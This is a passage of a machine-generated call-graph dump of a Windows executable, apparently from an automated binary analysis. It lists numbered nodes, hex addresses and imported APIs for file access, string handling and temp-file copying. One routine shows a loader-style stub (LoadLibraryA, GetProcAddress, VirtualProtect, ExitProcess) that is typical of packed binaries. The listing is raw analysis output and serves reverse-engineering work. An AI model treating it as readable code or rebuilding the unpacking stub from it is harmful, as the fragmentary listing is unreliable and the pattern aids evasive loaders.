95235->95237 95236->95232 95236->95234 95237->95196 95237->95237 95238->95196 95239->95165 95240->95142 95241->95138 95242->95196 95243->95165 95244->95196 95245->95196 95246->95196 95247->95197 95248->95197 95249->95201 95250->95159 95251->95165 95252->95176 95253->95165 95254->95165 95255->95165 95256->95165 95257->95165 95258->95165 95259->95165 95260->95165 95261->95151 95263 13ce28 __wsetenvp 95262->95263 95264 14ee75 48 API calls 95263->95264 95265 13ce50 _memcpy_s 95264->95265 95266 14f4ea 48 API calls 95265->95266 95267 13ce66 95266->95267 95267->95219 95269 13bce8 95268->95269 95273 13bcdb 95268->95273 95270 14f4ea 48 API calls 95269->95270 95271 13bcf2 95270->95271 95272 14ee75 48 API calls 95271->95272 95272->95273 95273->95219 95274->95224 95275->95230 95276->95236 95277 23af60 95278 23af70 95277->95278 95279 23b08a LoadLibraryA 95278->95279 95284 23b0cf VirtualProtect VirtualProtect 95278->95284 95280 23b0a1 95279->95280 95280->95278 95283 23b0b3 GetProcAddress 95280->95283 95282 23b134 95282->95282 95283->95280 95285 23b0c9 ExitProcess 95283->95285 95284->95282 95286 1a9bec 95320 140ae0 _memcpy_s Mailbox 95286->95320 95290 14146e 95296 136eed 48 API calls 95290->95296 95291 140509 95535 17cc5c 86 API calls 4 library calls 95291->95535 95293 14f4ea 48 API calls 95312 13fec8 95293->95312 95311 13ffe1 Mailbox 95296->95311 95297 141473 95534 17cc5c 86 API calls 4 library calls 95297->95534 95298 1aa922 95299 1aa246 95303 136eed 48 API calls 95299->95303 95302 136eed 48 API calls 95302->95312 95303->95311 95305 13d7f7 48 API calls 95305->95312 95306 1aa873 95307 1697ed InterlockedDecrement 95307->95312 95308 1aa30e 95308->95311 95530 1697ed InterlockedDecrement 95308->95530 95309 13ce19 48 API calls 95309->95320 95312->95290 95312->95291 95312->95293 95312->95297 95312->95299 95312->95302 95312->95305 95312->95307 95312->95308 95312->95311 95313 1aa973 95312->95313 95315 150f0a 52 API calls __cinit 95312->95315 95317 1415b5 95312->95317 95527 141820 331 API calls 2 library calls 95312->95527 95528 141d10 59 API calls Mailbox 95312->95528 95536 17cc5c 86 API calls 4 library calls 95313->95536 95315->95312 95316 1aa982 95533 17cc5c 86 API calls 4 library calls 95317->95533 95319 14f4ea 48 API calls 95319->95320 95320->95309 95320->95311 95320->95312 95320->95319 95322 1aa706 95320->95322 95323 141526 Mailbox 95320->95323 95325 1697ed InterlockedDecrement 95320->95325 95331 13fe30 95320->95331 95360 17b55b 95320->95360 95364 132a13 95320->95364 95367 190d09 95320->95367 95370 17fe7e 95320->95370 95409 132db5 95320->95409 95449 18f0ac 95320->95449 95481 17a6ef 95320->95481 95487 18e822 95320->95487 95529 18ef61 82 API calls 2 library calls 95320->95529 95531 17cc5c 86 API calls 4 library calls 95322->95531 95532 17cc5c 86 API calls 4 library calls 95323->95532 95325->95320 95332 13fe50 95331->95332 95357 13fe7e 95331->95357 95333 14f4ea 48 API calls 95332->95333 95333->95357 95334 14146e 95335 136eed 48 API calls 95334->95335 95358 13ffe1 95335->95358 95336 14f4ea 48 API calls 95336->95357 95337 140509 95542 17cc5c 86 API calls 4 library calls 95337->95542 95340 150f0a 52 API calls __cinit 95340->95357 95342 141473 95541 17cc5c 86 API calls 4 library calls 95342->95541 95343 1aa922 95343->95320 95344 1aa246 95347 136eed 48 API calls 95344->95347 95346 136eed 48 API calls 95346->95357 95347->95358 95349 13d7f7 48 API calls 95349->95357 95350 1697ed InterlockedDecrement 95350->95357 95351 1aa873 95351->95320 95352 1aa30e 95352->95358 95539 1697ed InterlockedDecrement 95352->95539 95354 1aa973 95543 17cc5c 86 API calls 4 library calls 95354->95543 95356 1aa982 95357->95334 95357->95336 95357->95337 95357->95340 95357->95342 95357->95344 95357->95346 95357->95349 95357->95350 95357->95352 95357->95354 95357->95358 95359 1415b5 95357->95359 95537 141820 331 API calls 2 library calls 95357->95537 95538 141d10 59 API calls Mailbox 95357->95538 95358->95320 95540 17cc5c 86 API calls 4 library calls 95359->95540 95361 17b564 95360->95361 95362 17b569 95360->95362 95544 17a4d5 95361->95544 95362->95320 95566 1335fe 95364->95566 95581 18f8ae 95367->95581 95369 190d19 95369->95320 95371 17fe9c 95370->95371 95372 17fea7 95370->95372 95718 13d286 95371->95718 95376 13936c 81 API calls 95372->95376 95401 17ff3a Mailbox 95372->95401 95374 14f4ea 48 API calls 95375 17ff5f 95374->95375 95377 17ff6b 95375->95377 95728 1348ba 49 API calls 95375->95728 95378 17feca 95376->95378 95381 13936c 81 API calls 95377->95381 95723 151dfc 95378->95723 95384 17ff83 95381->95384 95383 13ce19 48 API calls 95386 17fef3 95383->95386 95707 134550 95384->95707 95388 13518c 48 API calls 95386->95388 95391 17ff01 95388->95391 95389 17ff96 GetLastError 95392 17ffaf 95389->95392 95390 17ffca 95396 17fff5 95390->95396 95397 180011 95390->95397 95393 17ff33 95391->95393 95726 176514 GetFileAttributesW FindFirstFileW FindClose 95391->95726 95404 17ff43 Mailbox 95392->95404 95729 13453b CloseHandle 95392->95729 95395 13d286 48 API calls 95393->95395 95395->95401 95398 14f4ea 48 API calls 95396->95398 95399 14f4ea 48 API calls 95397->95399 95402 17fffa 95398->95402 95399->95404 95400 17ff11 95400->95393 95405 17ff15 95400->95405 95401->95374 95401->95404 95730 1929e8 48 API calls _memcpy_s 95402->95730 95404->95320 95727 176318 52 API calls 3 library calls 95405->95727 95408 17ff1e 95408->95393 95410 13cdb9 48 API calls 95409->95410 95411 132dcd 95410->95411 95413 14f4ea 48 API calls 95411->95413 95414 1a5f6d 95411->95414 95415 132ded 95413->95415 95428 132e22 95414->95428 95829 182113 48 API calls 95414->95829 95416 132dfd 95415->95416 95825 1348ba 49 API calls 95415->95825 95418 13936c 81 API calls 95416->95418 95420 132e0b 95418->95420 95419 13d286 48 API calls 95421 1a5fb9 95419->95421 95422 134550 56 API calls 95420->95422 95423 132e31 95421->95423 95424 1a5fc1 95421->95424 95425 132e1a 95422->95425 95426 132a13 2 API calls 95423->95426 95427 13d286 48 API calls 95424->95427 95425->95414 95425->95428 95828 13453b CloseHandle 95425->95828 95429 132e38 95426->95429 95427->95429 95428->95419 95428->95423 95430 132e45 95429->95430 95431 1a5fd4 95429->95431 95433 13d7f7 48 API calls 95430->95433 95434 14f4ea 48 API calls 95431->95434 95435 132e4d 95433->95435 95436 1a5fda 95434->95436 95802 14e52c 95435->95802 95438 1a5ff3 95436->95438 95830 14eb66 SetFilePointerEx ReadFile 95436->95830 95443 1a5ff7 _memcpy_s 95438->95443 95831 17a3e3 48 API calls _memset 95438->95831 95440 132e5c 95440->95443 95826 136b68 48 API calls 95440->95826 95444 132e70 Mailbox 95445 132eb0 95444->95445 95446 134907 CloseHandle 95444->95446 95445->95320 95447 132ea2 95446->95447 95827 13453b CloseHandle 95447->95827 95450 13d7f7 48 API calls 95449->95450 95451 18f0c0 95450->95451 95452 13d7f7 48 API calls 95451->95452 95453 18f0c8 95452->95453 95454 13d7f7 48 API calls 95453->95454 95455 18f0d0 95454->95455 95456 13936c 81 API calls 95455->95456 95480 18f0de 95456->95480 95457 136a63 48 API calls 95457->95480 95458 13c799 48 API calls 95458->95480 95459 18f2cc 95460 18f2f9 Mailbox 95459->95460 95881 136b68 48 API calls 95459->95881 95460->95320 95462 18f2b3 95463 13518c 48 API calls 95462->95463 95465 18f2c0 95463->95465 95464 18f2ce 95466 13518c 48 API calls 95464->95466 95879 13510d 48 API calls Mailbox 95465->95879 95470 18f2dd 95466->95470 95467 136eed 48 API calls 95467->95480 95468 13bdfa 48 API calls 95472 18f175 CharUpperBuffW 95468->95472 95880 13510d 48 API calls Mailbox 95470->95880 95471 13bdfa 48 API calls 95474 18f23a CharUpperBuffW 95471->95474 95868 13d645 95472->95868 95878 14d922 55 API calls 2 library calls 95474->95878 95477 13936c 81 API calls 95477->95480 95478 13518c 48 API calls 95478->95480 95479 13510d 48 API calls 95479->95480 95480->95457 95480->95458 95480->95459 95480->95460 95480->95462 95480->95464 95480->95467 95480->95468 95480->95471 95480->95477 95480->95478 95480->95479 95482 17a6fb 95481->95482 95483 14f4ea 48 API calls 95482->95483 95484 17a709 95483->95484 95485 17a717 95484->95485 95486 13d7f7 48 API calls 95484->95486 95485->95320 95486->95485 95488 18e868 95487->95488 95489 18e84e 95487->95489 95886 18ccdc 48 API calls 95488->95886 95885 17cc5c 86 API calls 4 library calls 95489->95885 95492 18e860 Mailbox 95492->95320 95493 18e871 95494 13fe30 330 API calls 95493->95494 95495 18e8cf 95494->95495 95495->95492 95496 18e96a 95495->95496 95498 18e916 95495->95498 95497 18e978 95496->95497 95501 18e9c7 95496->95501 95904 17a69d 48 API calls 95497->95904 95887 179b72 48 API calls 95498->95887 95500 18e949 95888 1445e0 95500->95888 95501->95492 95504 13936c 81 API calls 95501->95504 95507 18e9e1 95504->95507 95505 18e99b 95905 13bc74 48 API calls 95505->95905 95509 13bdfa 48 API calls 95507->95509 95508 18e9a3 Mailbox 95906 143200 331 API calls 2 library calls 95508->95906 95510 18ea05 CharUpperBuffW 95509->95510 95512 18ea1f 95510->95512 95513 18ea72 95512->95513 95514 18ea26 95512->95514 95515 13936c 81 API calls 95513->95515 95907 179b72 48 API calls 95514->95907 95516 18ea7a 95515->95516 95908 131caa 49 API calls 95516->95908 95519 18ea54 95520 1445e0 330 API calls 95519->95520 95520->95492 95521 18ea84 95521->95492 95522 13936c 81 API calls 95521->95522 95523 18ea9f 95522->95523 95909 13bc74 48 API calls 95523->95909 95525 18eaaf 95910 143200 331 API calls 2 library calls 95525->95910 95527->95312 95528->95312 95529->95320 95530->95311 95531->95323 95532->95311 95533->95311 95534->95306 95535->95298 95536->95316 95537->95357 95538->95357 95539->95358 95540->95358 95541->95351 95542->95343 95543->95356 95545 17a4ec 95544->95545 95556 17a5ee 95544->95556 95546 17a5d4 Mailbox 95545->95546 95548 17a58b 95545->95548 95550 17a4fd 95545->95550 95547 14f4ea 48 API calls 95546->95547 95563 17a54c _memcpy_s Mailbox 95547->95563 95549 14f4ea 48 API calls 95548->95549 95549->95563 95551 14f4ea 48 API calls 95550->95551 95561 17a51a 95550->95561 95551->95561 95552 17a555 95557 14f4ea 48 API calls 95552->95557 95553 17a545 95555 14f4ea 48 API calls 95553->95555 95554 14f4ea 48 API calls 95554->95556 95555->95563 95556->95362 95558 17a55b 95557->95558 95564 179d2d 48 API calls 95558->95564 95560 17a567 95565 14e65e 50 API calls 95560->95565 95561->95552 95561->95553 95561->95563 95563->95554 95564->95560 95565->95563 95571 1346ce 95566->95571 95569 1346ce 2 API calls 95570 132a1b 95569->95570 95570->95320 95578 1346e8 95571->95578 95572 1a40d0 95580 134798 SetFilePointerEx 95572->95580 95573 13476d SetFilePointerEx 95579 134798 SetFilePointerEx 95573->95579 95576 13361f 95576->95569 95577 1a40ea 95578->95572 95578->95573 95578->95576 95579->95576 95580->95577 95617 13936c 95581->95617 95583 18f8ea 95588 18f92c Mailbox 95583->95588 95637 190567 95583->95637 95585 18fb8b 95586 18fcfa 95585->95586 95593 18fb95 95585->95593 95689 190688 89 API calls Mailbox 95586->95689 95588->95369 95590 18fd07 95592 18fd13 95590->95592 95590->95593 95591 18f984 Mailbox 95591->95585 95591->95588 95594 13936c 81 API calls 95591->95594 95668 1929e8 48 API calls _memcpy_s 95591->95668 95669 18fda5 60 API calls 2 library calls 95591->95669 95592->95588 95650 18f70a 95593->95650 95594->95591 95599 18fbc9 95664 14ed18 95599->95664 95602 18fbfd 95605 14c050 48 API calls 95602->95605 95603 18fbe3 95670 17cc5c 86 API calls 4 library calls 95603->95670 95607 18fc14 95605->95607 95606 18fbee GetCurrentProcess TerminateProcess 95606->95602 95616 18fc3e 95607->95616 95671 141b90 95607->95671 95609 18fd65 95609->95588 95613 18fd7e FreeLibrary 95609->95613 95610 18fc2d 95687 19040f 105 API calls _free 95610->95687 95611 141b90 48 API calls 95611->95616 95613->95588 95616->95609 95616->95611 95688 13dcae 50 API calls Mailbox 95616->95688 95690 19040f 105 API calls _free 95616->95690 95618 139384 95617->95618 95635 139380 95617->95635 95619 1a4cbd __i64tow 95618->95619 95620 1a4bbf 95618->95620 95621 139398 95618->95621 95628 1393b0 __itow Mailbox _wcscpy 95618->95628 95622 1a4bc8 95620->95622 95623 1a4ca5 95620->95623 95691 15172b 80 API calls 3 library calls 95621->95691 95622->95628 95629 1a4be7 95622->95629 95692 15172b 80 API calls 3 library calls 95623->95692 95625 14f4ea 48 API calls 95627 1393ba 95625->95627 95631 13ce19 48 API calls 95627->95631 95627->95635 95628->95625 95630 14f4ea 48 API calls 95629->95630 95632 1a4c04 95630->95632 95631->95635 95633 14f4ea 48 API calls 95632->95633 95634 1a4c2a 95633->95634 95634->95635 95636 13ce19 48 API calls 95634->95636 95635->95583 95636->95635 95638 13bdfa 48 API calls 95637->95638 95639 190582 CharLowerBuffW 95638->95639 95693 171f11 95639->95693 95643 13d7f7 48 API calls 95644 1905bb 95643->95644 95700 1369e9 48 API calls _memcpy_s 95644->95700 95646 19061a Mailbox 95646->95591 95647 1905d2 95648 13b18b 48 API calls 95647->95648 95649 1905de Mailbox 95648->95649 95649->95646 95701 18fda5 60 API calls 2 library calls 95649->95701 95651 18f725 95650->95651 95655 18f77a 95650->95655 95652 14f4ea 48 API calls 95651->95652 95653 18f747 95652->95653 95654 14f4ea 48 API calls 95653->95654 95653->95655 95654->95653 95656 190828 95655->95656 95657 190a53 Mailbox 95656->95657 95663 19084b _strcat _wcscpy __wsetenvp 95656->95663 95657->95599 95658 13cf93 58 API calls 95658->95663 95659 13d286 48 API calls 95659->95663 95660 13936c 81 API calls 95660->95663 95661 15395c 47 API calls __malloc_crt 95661->95663 95663->95657 95663->95658 95663->95659 95663->95660 95663->95661 95704 178035 50 API calls __wsetenvp 95663->95704 95666 14ed2d 95664->95666 95665 14edc5 VirtualProtect 95667 14ed93 95665->95667 95666->95665 95666->95667 95667->95602 95667->95603 95668->95591 95669->95591 95670->95606 95672 141cf6 95671->95672 95674 141ba2 95671->95674 95672->95610 95673 141bae 95681 141bb9 95673->95681 95706 14c15c 48 API calls 95673->95706 95674->95673 95676 14f4ea 48 API calls 95674->95676 95677 1a49c4 95676->95677 95679 14f4ea 48 API calls 95677->95679 95678 141c5d 95678->95610 95686 1a49cf 95679->95686 95680 14f4ea 48 API calls 95682 141c9f 95680->95682 95681->95678 95681->95680 95683 141cb2 95682->95683 95705 132925 48 API calls 95682->95705 95683->95610 95685 14f4ea 48 API calls 95685->95686 95686->95673 95686->95685 95687->95616 95688->95616 95689->95590 95690->95616 95691->95628 95692->95628 95694 171f3b __wsetenvp 95693->95694 95695 171f79 95694->95695 95697 171f6f 95694->95697 95699 171ffa 95694->95699 95695->95643 95695->95649 95697->95695 95702 14d37a 60 API calls 95697->95702 95699->95695 95703 14d37a 60 API calls 95699->95703 95700->95647 95701->95646 95702->95697 95703->95699 95704->95663 95705->95683 95706->95681 95731 134907 95707->95731 95713 13458d 95763 1345be SetFilePointerEx SetFilePointerEx 95713->95763 95715 134594 95764 134845 SetFilePointerEx SetFilePointerEx WriteFile 95715->95764 95717 13459b 95717->95389 95717->95390 95719 13d297 95718->95719 95720 13d29c 95718->95720 95719->95720 95775 151621 48 API calls 95719->95775 95720->95372 95722 13d2d9 95722->95372 95776 151e46 95723->95776 95726->95400 95727->95408 95728->95377 95729->95404 95730->95404 95732 13455b 95731->95732 95733 134920 95731->95733 95735 1347ff 95732->95735 95733->95732 95734 134925 CloseHandle 95733->95734 95734->95732 95736 1a406e 95735->95736 95737 134818 CreateFileW 95735->95737 95738 134582 95736->95738 95739 1a4074 CreateFileW 95736->95739 95737->95738 95738->95717 95743 1345d5 95738->95743 95739->95738 95740 1a409a 95739->95740 95741 1346ce 2 API calls 95740->95741 95742 1a40a5 95741->95742 95742->95738 95744 1345f5 95743->95744 95745 1346ce 2 API calls 95744->95745 95752 1346a2 95744->95752 95754 13464e 95744->95754 95746 13462d 95745->95746 95747 14f4ea 48 API calls 95746->95747 95748 134638 95747->95748 95765 1347b7 95748->95765 95750 1346ce 2 API calls 95750->95752 95752->95713 95755 1346ce 2 API calls 95754->95755 95762 134689 95754->95762 95756 1a3e0a 95755->95756 95757 1335fe 2 API calls 95756->95757 95758 1a3e11 95757->95758 95759 14f4ea 48 API calls 95758->95759 95760 1a3e19 95759->95760 95761 13c2e0 2 API calls 95760->95761 95761->95762 95762->95750 95763->95715 95764->95717 95766 14f4ea 48 API calls 95765->95766 95767 134642 95766->95767 95768 13c2e0 95767->95768 95769 13c354 95768->95769 95773 13c2ee 95768->95773 95774 1345a6 SetFilePointerEx 95769->95774 95770 13c317 95770->95754 95772 13c327 ReadFile 95772->95770 95772->95773 95773->95770 95773->95772 95774->95773 95775->95722 95777 151e61 95776->95777 95780 151e55 95776->95780 95800 157c0e 47 API calls __getptd_noexit 95777->95800 95779 152019 95785 151e41 95779->95785 95801 156e10 8 API calls ___wstrgtold12_l 95779->95801 95780->95777 95787 151ed4 95780->95787 95795 159d6b 47 API calls ___wstrgtold12_l 95780->95795 95783 151fa0 95783->95777 95783->95785 95788 151fb0 95783->95788 95784 151f5f 95784->95777 95786 151f7b 95784->95786 95797 159d6b 47 API calls ___wstrgtold12_l 95784->95797 95785->95383 95786->95777 95786->95785 95791 151f91 95786->95791 95787->95777 95794 151f41 95787->95794 95796 159d6b 47 API calls ___wstrgtold12_l 95787->95796 95799 159d6b 47 API calls ___wstrgtold12_l 95788->95799 95798 159d6b 47 API calls ___wstrgtold12_l 95791->95798 95794->95783 95794->95784 95795->95787 95796->95794 95797->95786 95798->95785 95799->95785 95800->95779 95801->95785 95803 14e535 95802->95803 95804 14e547 95802->95804 95805 14e541 95803->95805 95806 14e53b 95803->95806 95807 13bcce 48 API calls 95804->95807 95808 14e63a 48 API calls 95805->95808 95832 14e63a 95806->95832 95817 175a81 95807->95817 95810 175c17 95808->95810 95813 13bf20 50 API calls 95810->95813 95811 175ab0 95811->95440 95816 175c25 95813->95816 95824 175c35 Mailbox 95816->95824 95846 175cf1 50 API calls 95816->95846 95817->95811 95844 175a27 SetFilePointerEx ReadFile 95817->95844 95845 13c799 48 API calls _memcpy_s 95817->95845 95819 1a40c9 95823 14e581 Mailbox 95823->95440 95824->95440 95825->95416 95826->95444 95827->95445 95828->95414 95829->95414 95830->95438 95831->95443 95833 14f4ea 48 API calls 95832->95833 95834 14e64d 95833->95834 95835 136b4a 48 API calls 95834->95835 95836 14e55f 95835->95836 95837 13bf20 95836->95837 95847 13c1c2 95837->95847 95839 13c2e0 2 API calls 95840 13bf31 95839->95840 95840->95839 95842 13bf66 95840->95842 95854 13bf71 95840->95854 95842->95819 95843 13c1de 50 API calls 95842->95843 95843->95823 95844->95817 95845->95817 95846->95824 95848 13c1d3 95847->95848 95849 1a3e49 95847->95849 95848->95840 95850 136b4a 48 API calls 95849->95850 95851 1a3e53 95850->95851 95852 14f4ea 48 API calls 95851->95852 95853 1a3e5f 95852->95853 95855 13bf85 95854->95855 95856 1a3d35 95854->95856 95863 13c3b9 95855->95863 95857 136b4a 48 API calls 95856->95857 95860 1a3d40 95857->95860 95859 13bf91 95859->95840 95861 14f4ea 48 API calls 95860->95861 95862 1a3d55 _memcpy_s 95861->95862 95864 13c3cf 95863->95864 95867 13c3ca _memcpy_s 95863->95867 95865 1a3e67 95864->95865 95866 14f4ea 48 API calls 95864->95866 95866->95867 95867->95859 95869 13d654 95868->95869 95877 13d67e 95868->95877 95870 13d65b 95869->95870 95874 13d6c2 95869->95874 95871 13d6ab 95870->95871 95872 13d666 95870->95872 95871->95877 95883 14dce0 53 API calls 95871->95883 95882 13d9a0 53 API calls __cinit 95872->95882 95874->95871 95884 14dce0 53 API calls 95874->95884 95877->95480 95878->95480 95879->95459 95880->95459 95881->95460 95882->95877 95883->95877 95884->95871 95885->95492 95886->95493 95887->95500 95889 144637 95888->95889 95890 14479f 95888->95890 95891 144643 95889->95891 95892 1a6e05 95889->95892 95893 13ce19 48 API calls 95890->95893 95964 144300 331 API calls _memcpy_s 95891->95964 95895 18e822 331 API calls 95892->95895 95900 1446e4 Mailbox 95893->95900 95896 1a6e11 95895->95896 95897 144739 Mailbox 95896->95897 95965 17cc5c 86 API calls 4 library calls 95896->95965 95897->95492 95899 144659 95899->95896 95899->95897 95899->95900 95911 176524 95900->95911 95914 186ff0 95900->95914 95923 17fa0c 95900->95923 95904->95505 95905->95508 95906->95492 95907->95519 95908->95521 95909->95525 95910->95492 95966 176ca9 GetFileAttributesW 95911->95966 95915 13936c 81 API calls 95914->95915 95916 18702a 95915->95916 95970 13b470 95916->95970 95918 18705f 95921 13cdb9 48 API calls 95918->95921 95922 187063 95918->95922 95919 18703a 95919->95918 95920 13fe30 331 API calls 95919->95920 95920->95918 95921->95922 95922->95897 95924 17fa1c __ftell_nolock 95923->95924 95925 17fa44 95924->95925 95926 13d286 48 API calls 95924->95926 95927 13936c 81 API calls 95925->95927 95926->95925 95928 17fa5e 95927->95928 95929 17fa80 95928->95929 95930 17fb68 95928->95930 95939 17fb92 95928->95939 95931 13936c 81 API calls 95929->95931 96007 1341a9 95930->96007 95937 17fa8c _wcscpy _wcschr 95931->95937 95934 17fb8e 95936 13936c 81 API calls 95934->95936 95934->95939 95935 1341a9 136 API calls 95935->95934 95938 17fbc7 95936->95938 95943 17fab0 _wcscat _wcscpy 95937->95943 95947 17fade _wcscat 95937->95947 95940 151dfc __wsplitpath 47 API calls 95938->95940 95939->95897 95944 17fbeb _wcscat _wcscpy 95940->95944 95941 13936c 81 API calls 95942 17fafc _wcscpy 95941->95942 96088 1772cb GetFileAttributesW 95942->96088 95946 13936c 81 API calls 95943->95946 95952 13936c 81 API calls 95944->95952 95946->95947 95947->95941 95948 17fb1c __wsetenvp 95948->95939 95949 13936c 81 API calls 95948->95949 95950 17fb48 95949->95950 96089 1760dd 77 API calls 4 library calls 95950->96089 95954 17fc82 95952->95954 95953 17fb5c 95953->95939 96031 17690b 95954->96031 95956 17fca2 95957 176524 3 API calls 95956->95957 95958 17fcb1 95957->95958 95959 13936c 81 API calls 95958->95959 95962 17fce2 95958->95962 95960 17fccb 95959->95960 96037 17bfa4 95960->96037 96090 134252 95962->96090 95964->95899 95965->95897 95967 176529 95966->95967 95968 176cc4 FindFirstFileW 95966->95968 95967->95897 95968->95967 95969 176cd9 FindClose 95968->95969 95969->95967 95971 136b0f 48 API calls 95970->95971 95989 13b495 95971->95989 95972 13b69b 96000 13ba85 48 API calls _memcpy_s 95972->96000 95974 13b6b5 Mailbox 95974->95919 95977 1a397b 96004 1726bc 88 API calls 4 library calls 95977->96004 95979 13b9e4 96006 1726bc 88 API calls 4 library calls 95979->96006 95981 1a3973 95981->95974 95984 13ba85 48 API calls 95984->95989 95985 1a3989 96005 13ba85 48 API calls _memcpy_s 95985->96005 95986 13bcce 48 API calls 95986->95989 95988 1a3909 95990 136b4a 48 API calls 95988->95990 95989->95972 95989->95977 95989->95979 95989->95984 95989->95986 95989->95988 95991 13bb85 48 API calls 95989->95991 95994 13bdfa 48 API calls 95989->95994 95997 1a3939 _memcpy_s 95989->95997 95998 13c413 59 API calls 95989->95998 95999 13bc74 48 API calls 95989->95999 96001 13c6a5 49 API calls 95989->96001 96002 13c799 48 API calls _memcpy_s 95989->96002 95992 1a3914 95990->95992 95991->95989 95996 14f4ea 48 API calls 95992->95996 95995 13b66c CharUpperBuffW 95994->95995 95995->95989 95996->95997 96003 1726bc 88 API calls 4 library calls 95997->96003 95998->95989 95999->95989 96000->95974 96001->95989 96002->95989 96003->95981 96004->95985 96005->95981 96006->95981 96096 134214 96007->96096 96012 1341d4 LoadLibraryExW 96106 134291 96012->96106 96013 1a4f73 96014 134252 84 API calls 96013->96014 96016 1a4f7a 96014->96016 96018 134291 3 API calls 96016->96018 96020 1a4f82 96018->96020 96132 1344ed 96020->96132 96021 1341fb 96021->96020 96022 134207 96021->96022 96023 134252 84 API calls 96022->96023 96025 13420c 96023->96025 96025->95934 96025->95935 96028 1a4fa9 96140 134950 96028->96140 96032 176918 _wcschr __ftell_nolock 96031->96032 96033 151dfc __wsplitpath 47 API calls 96032->96033 96035 17692e _wcscat _wcscpy 96032->96035 96034 17695d 96033->96034 96036 151dfc __wsplitpath 47 API calls 96034->96036 96035->95956 96036->96035 96038 17bfb1 __ftell_nolock 96037->96038 96039 14f4ea 48 API calls 96038->96039 96040 17c00e 96039->96040 96041 1347b7 48 API calls 96040->96041 96042 17c018 96041->96042 96043 17bdb4 GetSystemTimeAsFileTime 96042->96043 96044 17c023 96043->96044 96045 134517 83 API calls 96044->96045 96046 17c036 _wcscmp 96045->96046 96047 17c107 96046->96047 96048 17c05a 96046->96048 96049 17c56d 94 API calls 96047->96049 96648 17c56d 96048->96648 96065 17c0d3 _wcscat 96049->96065 96052 151dfc __wsplitpath 47 API calls 96057 17c088 _wcscat _wcscpy 96052->96057 96053 1344ed 64 API calls 96054 17c12c 96053->96054 96056 1344ed 64 API calls 96054->96056 96055 17c110 96055->95962 96058 17c13c 96056->96058 96060 151dfc __wsplitpath 47 API calls 96057->96060 96059 1344ed 64 API calls 96058->96059 96061 17c157 96059->96061 96060->96065 96062 1344ed 64 API calls 96061->96062 96063 17c167 96062->96063 96064 1344ed 64 API calls 96063->96064 96066 17c182 96064->96066 96065->96053 96065->96055 96067 1344ed 64 API calls 96066->96067 96068 17c192 96067->96068 96069 1344ed 64 API calls 96068->96069 96070 17c1a2 96069->96070 96071 1344ed 64 API calls 96070->96071 96072 17c1b2 96071->96072 96618 17c71a GetTempPathW GetTempFileNameW 96072->96618 96074 17c1be 96075 153499 117 API calls 96074->96075 96077 17c1cf 96075->96077 96077->96055 96079 1344ed 64 API calls 96077->96079 96087 17c289 96077->96087 96619 152aae 96077->96619 96078 17c294 96078->96055 96080 17c342 CopyFileW 96078->96080 96084 17c2b8 96078->96084 96079->96077 96081 17c32d 96080->96081 96082 17c358 96080->96082 96081->96055 96645 17c6d9 CreateFileW 96081->96645 96082->96055 96654 17b965 96084->96654 96632 1535e4 96087->96632 96088->95948 96089->95953 96091 134263 96090->96091 96092 13425c 96090->96092 96094 134283 FreeLibrary 96091->96094 96095 134272 96091->96095 96093 1535e4 __fcloseall 83 API calls 96092->96093 96093->96091 96094->96095 96095->95939 96145 134339 96096->96145 96100 134244 FreeLibrary 96101 1341bb 96100->96101 96103 153499 96101->96103 96102 13423c 96102->96100 96102->96101 96153 1534ae 96103->96153 96105 1341c8 96105->96012 96105->96013 96356 1342e4 96106->96356 96109 1342b8 96111 1342c1 FreeLibrary 96109->96111 96112 1341ec 96109->96112 96111->96112 96113 134380 96112->96113 96114 14f4ea 48 API calls 96113->96114 96115 134395 96114->96115 96116 1347b7 48 API calls 96115->96116 96117 1343a1 _memcpy_s 96116->96117 96118 1344d1 96117->96118 96119 134499 96117->96119 96123 1343dc 96117->96123 96375 17c750 93 API calls 96118->96375 96364 13406b CreateStreamOnHGlobal 96119->96364 96120 134950 57 API calls 96129 1343e5 96120->96129 96123->96120 96124 1344ed 64 API calls 96124->96129 96125 134479 96125->96021 96127 1a4ed7 96128 134517 83 API calls 96127->96128 96130 1a4eeb 96128->96130 96129->96124 96129->96125 96129->96127 96370 134517 96129->96370 96131 1344ed 64 API calls 96130->96131 96131->96125 96133 1344ff 96132->96133 96136 1a4fc0 96132->96136 96399 15381e 96133->96399 96137 17bf5a 96595 17bdb4 96137->96595 96139 17bf70 96139->96028 96141 13495f 96140->96141 96144 1a5002 96140->96144 96600 153e65 96141->96600 96143 134967 96149 13434b 96145->96149 96148 134321 LoadLibraryA GetProcAddress 96148->96102 96150 13422f 96149->96150 96151 134354 LoadLibraryA 96149->96151 96150->96102 96150->96148 96151->96150 96152 134365 GetProcAddress 96151->96152 96152->96150 96156 1534ba __getstream 96153->96156 96154 1534cd 96201 157c0e 47 API calls __getptd_noexit 96154->96201 96156->96154 96158 1534fe 96156->96158 96157 1534d2 96202 156e10 8 API calls ___wstrgtold12_l 96157->96202 96172 15e4c8 96158->96172 96161 153503 96162 15350c 96161->96162 96163 153519 96161->96163 96203 157c0e 47 API calls __getptd_noexit 96162->96203 96164 153543 96163->96164 96165 153523 96163->96165 96186 15e5e0 96164->96186 96204 157c0e 47 API calls __getptd_noexit 96165->96204 96169 1534dd @_EH4_CallFilterFunc@8 __getstream 96169->96105 96173 15e4d4 __getstream 96172->96173 96206 157cf4 96173->96206 96175 15e4e2 96176 15e559 96175->96176 96184 15e552 96175->96184 96216 157d7c 96175->96216 96239 154e5b 48 API calls __lock 96175->96239 96240 154ec5 RtlLeaveCriticalSection RtlLeaveCriticalSection _doexit 96175->96240 96241 1569d0 96176->96241 96180 15e5cc __getstream 96180->96161 96181 15e56f InitializeCriticalSectionAndSpinCount RtlEnterCriticalSection 96181->96184 96213 15e5d7 96184->96213 96187 15e600 __wopenfile 96186->96187 96188 15e61a 96187->96188 96200 15e7d5 96187->96200 96266 15185b 59 API calls 2 library calls 96187->96266 96264 157c0e 47 API calls __getptd_noexit 96188->96264 96190 15e61f 96265 156e10 8 API calls ___wstrgtold12_l 96190->96265 96192 15e838 96261 1663c9 96192->96261 96193 15354e 96205 153570 RtlLeaveCriticalSection RtlLeaveCriticalSection _fprintf 96193->96205 96196 15e7ce 96196->96200 96267 15185b 59 API calls 2 library calls 96196->96267 96198 15e7ed 96198->96200 96268 15185b 59 API calls 2 library calls 96198->96268 96200->96188 96200->96192 96201->96157 96202->96169 96203->96169 96204->96169 96205->96169 96207 157d05 96206->96207 96208 157d18 RtlEnterCriticalSection 96206->96208 96209 157d7c __mtinitlocknum 46 API calls 96207->96209 96208->96175 96210 157d0b 96209->96210 96210->96208 96247 15115b 47 API calls 3 library calls 96210->96247 96248 157e58 